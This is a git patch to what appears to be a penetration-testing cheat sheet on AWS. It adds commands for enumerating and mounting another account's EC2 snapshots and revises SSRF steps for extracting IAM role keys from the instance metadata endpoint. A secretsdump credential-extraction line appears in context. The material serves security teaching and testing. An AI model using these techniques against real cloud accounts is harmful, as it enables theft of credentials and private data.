From 255aaec3995126b07bbc56113561429083160183 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 15 Sep 2024 22:00:29 +0200 Subject: [PATCH] EC2 Snapshots --- docs/cloud/aws/aws-ec2.md | 25 +++++++++++++++++++++++++ docs/cloud/aws/aws-metadata.md | 10 +++++----- 2 files changed, 30 insertions(+), 5 deletions(-) diff --git a/docs/cloud/aws/aws-ec2.md b/docs/cloud/aws/aws-ec2.md index f95e62b..a13407b 100644 --- a/docs/cloud/aws/aws-ec2.md +++ b/docs/cloud/aws/aws-ec2.md @@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Access Snapshots + +1. Get the `owner-id` + ```powershell + $ aws --profile flaws sts get-caller-identity + "Account": "XXXX26262029", + ``` +2. List snapshots + ```powershell + $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2 + "SnapshotId": "snap-XXXX342abd1bdcb89", + ``` +3. Create a volume using the previously obtained `snapshotId` + ```powershell + $ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89 + ``` +4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine. + ```ps1 + $ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com + $ lsblk + $ sudo file -s /dev/xvda1 + $ sudo mount /dev/xvda1 /mnt + ``` + + ## Instance Connect Push an SSH key to EC2 instance diff --git a/docs/cloud/aws/aws-metadata.md b/docs/cloud/aws/aws-metadata.md index aa317f4..f0df10a 100644 --- a/docs/cloud/aws/aws-metadata.md +++ b/docs/cloud/aws/aws-metadata.md @@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta ## Method for Elastic Cloud Compute (EC2) -Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ +Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254. -1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ +1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/) ```powershell ami-id ami-launch-index @@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me instance-action instance-id ``` -2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ -3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ +2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/) +3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials//](http://169.254.169.254/latest/meta-data/iam/security-credentials//) ```powershell { "Code" : "Success", @@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me ## AWS API calls that return credentials -- chime:createapikey +- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html) - [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) - [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) - [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)